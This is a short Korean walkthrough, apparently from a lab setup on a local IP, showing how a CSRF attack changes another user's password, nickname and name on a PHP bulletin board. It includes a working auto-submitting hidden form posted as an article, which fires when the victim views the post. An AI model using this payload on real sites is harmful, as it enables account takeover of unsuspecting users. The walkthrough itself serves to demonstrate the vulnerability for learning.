csrf를 이용한 비밀번호 변경

csrf를 이용한 비밀번호 변경

 

csrf를 이용하여 타 사용자 비밀 번호 변경해보자

 

 

먼저 공격자는 비밀 번호 변경페이지에서 넘겨주는 값을 알아본다.

 

 

 

 

글작성 페이지로 넘어와 글을 작성한다

위에서 알아본 정보로 글을 작성한다

 

<body onload="document.form.submit();">
<form METHOD ="POST" action="http://192.168.231.131/xxx/mb_edit.php?url=%2Fxxx%2Faddon.php%3Ffile%3Dmain.php" name="form" enctype="multipart/form-data">
<input type=hidden name="act" value="ok">
<input type=hidden name="url" value="/xxxx/addon.php?file=main.php">
<input type=hidden name="mb_password" value="321321">    // 글 확인시 바꿀 패스워드
<input type=hidden name="mb_passwd" value="321321">     // 변경할 패스워드 2차 확인
<input type=hidden name="mb_nick" value="바뀌죠">        //  변경할 닉
<input type=hidden name="mb_name" value="바뀌죠">     // 변경할 이름
</form>

 

 

 

글 작성 확인

 

 

 

이제 피해자 계정으로 접속하여 글을 확인해본다

 

 

 

확인하는순간  모든정보가 바뀌게 된다

 

정보가 바뀌게 된다

 

닉 이름 비밀번호 보두 변경이 되었다.